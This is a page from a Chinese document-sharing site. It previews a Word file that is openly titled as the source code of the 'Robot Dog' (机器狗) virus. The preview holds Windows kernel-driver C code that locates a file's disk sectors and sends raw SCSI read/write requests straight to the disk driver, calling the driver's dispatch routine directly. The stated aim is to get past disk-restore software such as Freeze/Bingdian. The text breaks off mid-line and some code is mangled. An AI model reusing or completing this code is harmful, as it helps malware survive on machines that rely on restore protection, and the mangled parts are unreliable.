收藏
下载资源下载资源 加入VIP,免费下载

机器狗病毒源码1C语言.docx

上传人:b****5 文档编号:4276755 上传时间:2022-11-28 格式:DOCX 页数:17 大小:19.88KB
下载 相关 举报
机器狗病毒源码1C语言.docx_第1页
第1页 / 共17页
机器狗病毒源码1C语言.docx_第2页
第2页 / 共17页
机器狗病毒源码1C语言.docx_第3页
第3页 / 共17页
机器狗病毒源码1C语言.docx_第4页
第4页 / 共17页
机器狗病毒源码1C语言.docx_第5页
第5页 / 共17页
点击查看更多>>
下载资源
资源描述

机器狗病毒源码1C语言.docx

《机器狗病毒源码1C语言.docx》由会员分享,可在线阅读,更多相关《机器狗病毒源码1C语言.docx(17页珍藏版)》请在冰豆网上搜索。

机器狗病毒源码1C语言.docx

机器狗病毒源码1C语言

//备注:

获取文件在扇区的位置后,向磁盘驱动发送srb命令读写扇区,来穿透冰点等还原软件。

//编译时注意:

FileSystemControl的数据结构需要自己添加。

#include

#include

#defineFSCTL_GET_RETRIEVAL_POINTERS0x90073

#definePARTITION_TYPE_NTFS0x07

#definePARTITION_TYPE_FAT320x0B

#definePARTITION_TYPE_FAT32_LBA0x0C

externPOBJECT_TYPE*IoDriverObjectType;

LARGE_INTEGERrealdiskpos;

ULONGsectorspercluster;

typedefstructRETRIEVAL_POINTERS_BUFFER{

ULONGExtentCount;

LARGE_INTEGERStartingVcn;

struct{

LARGE_INTEGERNextVcn;

LARGE_INTEGERLcn;

}Extents[1];

}RETRIEVAL_POINTERS_BUFFER,*PRETRIEVAL_POINTERS_BUFFER;

typedefstruct{LARGE_INTEGERStartingVcn;

}STARTING_VCN_INPUT_BUFFER,*PSTARTING_VCN_INPUT_BUFFER;

typedefstruct_SENSE_DATA{

unsignedcharValid;

unsignedcharSegmentNumber;

unsignedcharFileMark;

unsignedcharInformation[4];

unsignedcharAdditionalSenseLength;

unsignedcharCommandSpecificInformation[4];

unsignedcharAdditionalSenseCode;

unsignedcharAdditionalSenseCodeQualifier;

unsignedcharFieldReplaceableUnitCode;

unsignedcharSenseKeySpecific[3];

}SENSE_DATA,*PSENSE_DATA;

#pragmapack

(1)

typedefstruct_PARTITION_ENTRY

{

UCHARactive;

UCHARStartHead;

UCHARStartSector;

UCHARStartCylinder;

UCHARPartitionType;

UCHAREndHead;

UCHAREndSector;

UCHAREndCylinder;

ULONGStartLBA;

ULONGTotalSector;

}PARTITION_ENTRY,*PPARTITION_ENTRY;

typedefstruct_MBR_SECTOR

{

UCHARBootCode[446];

PARTITION_ENTRYPartition[4];

USHORTSignature;

}MBR_SECTOR,*PMBR_SECTOR;

typedefstruct_BBR_SECTOR

{

USHORTJmpCode;

UCHARNopCode;

UCHAROEMName[8];

USHORTBytesPerSector;

UCHARSectorsPerCluster;

USHORTReservedSectors;

UCHARNumberOfFATs;

USHORTRootEntries;

USHORTNumberOfSectors16;

UCHARMediaDescriptor;

USHORTSectorsPerFAT16;

USHORTSectorsPerTrack;

USHORTHeadsPerCylinder;

ULONGHiddenSectors;

ULONGNumberOfSectors32;

ULONGSectorsPerFAT32;

}BBR_SECTOR,*PBBR_SECTOR;

#pragmapack()

typedefstruct_SYSTEM_MODULE_INFORMATION{

ULONGReserved[2];

PVOIDBase;

ULONGSize;

ULONGFlags;

USHORTIndex;

USHORTUnknown;

USHORTLoadCount;

USHORTModuleNameOffset;

CHARImageName[255];

}SYSTEM_MODULE_INFORMATION,*PSYSTEM_MODULE_INFORMATION;

NTSYSAPI

NTSTATUS

NTAPI

ObReferenceObjectByName(

INPUNICODE_STRINGObjectName,

INULONGAttributes,

INPACCESS_STATEAccessStateOPTIONAL,

INACCESS_MASKDesiredAccessOPTIONAL,

INPOBJECT_TYPEObjectType,

INKPROCESSOR_MODEAccessMode,

INOUTPVOIDParseContextOPTIONAL,

OUTPVOID*Object);

NTSYSAPI

NTSTATUS

NTAPI

ZwQuerySystemInformation(

INULONGSystemInformationClass,

INOUTPVOIDSystemInformation,

INULONGSystemInformationLength,

OUTPULONGReturnLength);

NTSTATUS

IrpCompletionRoutine(

INPDEVICE_OBJECTDeviceObject,

INPIRPIrp,

INPVOIDContext

){

PMDLmdl;

Irp->UserIosb->Status=Irp->IoStatus.Status;

Irp->UserIosb->Information=Irp->IoStatus.Information;

if(!

Context)

{

mdl=Irp->MdlAddress;

if(mdl){

DbgPrint("readsize:

%d..",Irp->IoStatus.Information);

MmUnlockPages(mdl);

IoFreeMdl(mdl);

}}

KeSetEvent(Irp->UserEvent,IO_NO_INCREMENT,0);

IoFreeIrp(Irp);

returnSTATUS_MORE_PROCESSING_REQUIRED;

}

NTSTATUSIrpCompletionRoutine_0(

INPDEVICE_OBJECTDeviceObject,

INPIRPIrp,

INPVOIDContext

){

PMDLmdl;

Irp->UserIosb->Status=Irp->IoStatus.Status;

Irp->UserIosb->Information=Irp->IoStatus.Information;

if(!

Context)

{

mdl=Irp->MdlAddress;

if(mdl)

{

DbgPrint("readsize:

%d..",Irp->IoStatus.Information);

MmUnlockPages(mdl);

IoFreeMdl(mdl);

}

}

KeSetEvent(Irp->UserEvent,IO_NO_INCREMENT,0);

IoFreeIrp(Irp);

returnSTATUS_MORE_PROCESSING_REQUIRED;

}

ULONGGetModuleBase(char*name){

ULONGn,i;

PSYSTEM_MODULE_INFORMATIONmodule;

PVOIDpbuftmp;

charmodulename[255];

ZwQuerySystemInformation(11,&n,0,&n);

pbuftmp=ExAllocatePool(NonPagedPool,n);

ZwQuerySystemInformation(11,pbuftmp,n,NULL);

module=(PSYSTEM_MODULE_INFORMATION)((PULONG)pbuftmp+1);

n=*((PULONG)pbuftmp);

for(i=0;i

{

strcpy(modulename,module.ImageName+module.ModuleNameOffset);

if(!

_strnicmp(modulename,name,strlen(name))){

ExFreePool(pbuftmp);

return(ULONG)module.Base;

}

}

ExFreePool(pbuftmp);

return0;

}

NTSTATUSMyIoCallDriver(PDEVICE_OBJECTDeviceObject,PIRPIrp)//自己的IoCallDriver

{

PIO_STACK_LOCATIONstack;

--Irp->CurrentLocation;

stack=IoGetNextIrpStackLocation(Irp);

Irp->Tail.Overlay.CurrentStackLocation=stack;//移动堆栈

stack->DeviceObject=DeviceObject;

return(DeviceObject->DriverObject->MajorFunction[(ULONG)stack->MajorFunction])(DeviceObject,Irp);

}

ULONGAtapiReadWriteDisk(PDEVICE_OBJECTdev_object,ULONGMajorFunction,PVOIDbuffer,ULONGDiskPos,intBlockCount)

{

NTSTATUSstatus;

PSCSI_REQUEST_BLOCKsrb;

PSENSE_DATAsense;

KEVENTEvent;

PIRPirp;

PMDLmdl;

IO_STATUS_BLOCKisb;

PIO_STACK_LOCATIONisl;

PVOIDpsense;

intcount=8;

while

(1){

srb=ExAllocatePool(0,sizeof(SCSI_REQUEST_BLOCK));

if(!

srb)

break;

sense=ExAllocatePool(0,sizeof(SENSE_DATA));

psense=sense;

if(!

sense)

break;

memset(srb,0,sizeof(SCSI_REQUEST_BLOCK));

memset(sense,0,sizeof(SENSE_DATA));

srb->Length=sizeof(SCSI_REQUEST_BLOCK);//更多关于srb,请看《SCSI总线和IDE接口:

协议、应用和编程》和《SCSI程序员指南》

srb->Function=0;

srb->DataBuffer=buffer;

srb->DataTransferLength=BlockCount<<9;//sectorsize*numberofsector

srb->QueueAction=SRB_FLAGS_DISABLE_AUTOSENSE;

srb->SrbStatus=0;

srb->ScsiStatus=0;

srb->NextSrb=0;

srb->SenseInfoBuffer=sense;

srb->SenseInfoBufferLength=sizeof(SENSE_DATA);

if(MajorFunction==IRP_MJ_READ)

srb->SrbFlags=SRB_FLAGS_DATA_IN;

else

srb->SrbFlags=SRB_FLAGS_DATA_OUT;

if(MajorFunction==IRP_MJ_READ)

srb->SrbFlags|=SRB_FLAGS_ADAPTER_CACHE_ENABLE;

srb->SrbFlags|=SRB_FLAGS_DISABLE_AUTOSENSE;

srb->TimeOutValue=(srb->DataTransferLength>>10)+1;

srb->QueueSortKey=DiskPos;

srb->CdbLength=10;

srb->Cdb[0]=2*((UCHAR)MajorFunction+17);

srb->Cdb[1]=srb->Cdb[1]&0x1F|0x80;

srb->Cdb[2]=(unsignedchar)(DiskPos>>0x18)&0xFF;//

srb->Cdb[3]=(unsignedchar)(DiskPos>>0x10)&0xFF;//

srb->Cdb[4]=(unsignedchar)(DiskPos>>0x08)&0xFF;//

srb->Cdb[5]=(UCHAR)DiskPos;//填写sector位置

srb->Cdb[7]=(UCHAR)BlockCount>>0x08;

srb->Cdb[8]=(UCHAR)BlockCount;

//By:

Eros412

KeInitializeEvent(&Event,0,0);

irp=IoAllocateIrp(dev_object->StackSize,0);

mdl=IoAllocateMdl(buffer,BlockCount<<9,0,0,irp);

irp->MdlAddress=mdl;

if(!

mdl){

ExFreePool(srb);

ExFreePool(psense);

IoFreeIrp(irp);

returnSTATUS_INSUFFICIENT_RESOURCES;

}

MmProbeAndLockPages(mdl,0,(MajorFunction==IRP_MJ_READ?

0:

1));

srb->OriginalRequest=irp;

irp->UserIosb=&isb;

irp->UserEvent=&Event;

irp->IoStatus.Status=0;

irp->IoStatus.Information=0;

irp->Flags=IRP_SYNCHRONOUS_API|IRP_NOCACHE;

irp->AssociatedIrp.SystemBuffer=0;

irp->Cancel=0;

irp->RequestorMode=0;

irp->CancelRoutine=0;

irp->Tail.Overlay.Thread=PsGetCurrentThread();

isl=IoGetNextIrpStackLocation(irp);

isl->DeviceObject=dev_object;

isl->MajorFunction=IRP_MJ_SCSI;

isl->Parameters.Scsi.Srb=srb;

isl->CompletionRoutine=IrpCompletionRoutine_0;

isl->Context=srb;

isl->Control=SL_INVOKE_ON_CANCEL|SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON_ERROR;

status=MyIoCallDriver(dev_object,irp);

KeWaitForSingleObject(&Event,0,0,0,0);

if(srb->SenseInfoBuffer!

=psense&&srb->SenseInfoBuffer)

ExFreePool(srb->SenseInfoBuffer);

ExFreePool(srb);

ExFreePool(psense);

if(status>=0||!

count)

returnstatus;

DbgPrint("SendXXXFailed..%08x\r\n",status);

KeStallExecutionProcessor(1u);

--count;

}

returnSTATUS_INSUFFICIENT_RESOURCES;

}

PDEVICE_OBJECTGetLastDiskDeviceObject(PDRIVER_OBJECTdrv_object)//这个就是DR0

{

PDEVICE_OBJECTresult;

PDEVICE_OBJECTfinddev;

finddev=drv_object->DeviceObject;

result=NULL;

while(finddev)

{

if(finddev->DeviceType==FILE_DEVICE_DISK)

result=finddev;

finddev=finddev->NextDevice;

}

returnresult;

}

PDEVICE_OBJECTGetAtaDr0DevObject(){

UNICODE_STRINGdiskstr;

PDRIVER_OBJECTdiskdrv;

PDEVICE_OBJECTdr0dev;

RtlInitUnicodeString(&diskstr,L"\\Driver\\Disk");

if(ObReferenceObjectByName(&diskstr,64,0,0,*IoDriverObjectType,0,0,&diskdrv)<0)

returnNULL;

dr0dev=GetLastDiskDeviceObject(diskdrv);

if(dr0dev)

DbgPrint("Eros412said:

atadr0devobjis:

%08x...",dr0dev);

ObfDereferenceObject(diskdrv);

returndr0dev;

}

PDEVICE_OBJECTGetFileObjectDevice(PFILE_OBJECTObject){

PDEVICE_OBJECTresult=NULL;

PVPBvpb;

vpb=Object->Vpb;

result=vpb->DeviceObject;

if(!

vpb||!

result)

{

if(!

Object->DeviceObject->Vpb||!

Object->DeviceObject->Vpb->DeviceObject)

result=Object->DeviceObject;

}

returnresult;

}

PLARGE_INTEGERGetPosAndCluster()//得到第一个分区文件数据的起始位置

{

PVOIDbuffer;

ULONGtype,startlba;

inti;

PLARGE_INTEGERresult;

PDEVICE_OBJECTdev;

PMBR_SECTORmbrsec;

PPARTITION_ENTRYpartition0;

PBBR_SECTORbootsec;

result=ExAllocatePool(0,sizeof(LARGE_INTEGER));

dev=GetAtaDr0DevObject();

if(dev){

buffer=ExAllocatePool(0,512);

memset(buffer,0,512);

if(AtapiReadWriteDisk(dev,IRP_MJ_READ,buffer,0,1)>0)

DbgPrint("AtapiReadWriteDiskok");

mbrsec=(PMBR_SECTOR)buffer;

partition0=&mbrsec->Partition[0];

startlba=partition0[0].StartLBA;

type=partition0[0].PartitionType;

DbgPrint("dwPartOnePos:

0x%08x..1",startlba);

result->QuadPart=startlba;

memset(buffer,0,512);

if(AtapiReadWriteDisk(dev,IRP_MJ_READ,buffer,startlba,1)>0){

bootsec=(PBBR_SECTOR)buffer;

DbgPrint("gSectorsPerCluster:

%d...",bootsec->SectorsPerCluster);

sectorspercluster=bootsec->SectorsPerCluster;

}

result->QuadPart+=bootsec->ReservedSectors;

DbgPrint("dwPartOnePos:

%I64x..2\r\n",result->QuadPart);

if(type==PARTITION_TYPE_FAT32||type==PARTITION_TYPE_FAT32_LBA)

result->QuadPart+=bootsec->NumberOfFATs*bootsec->SectorsPerFA

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 小学教育 > 英语

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1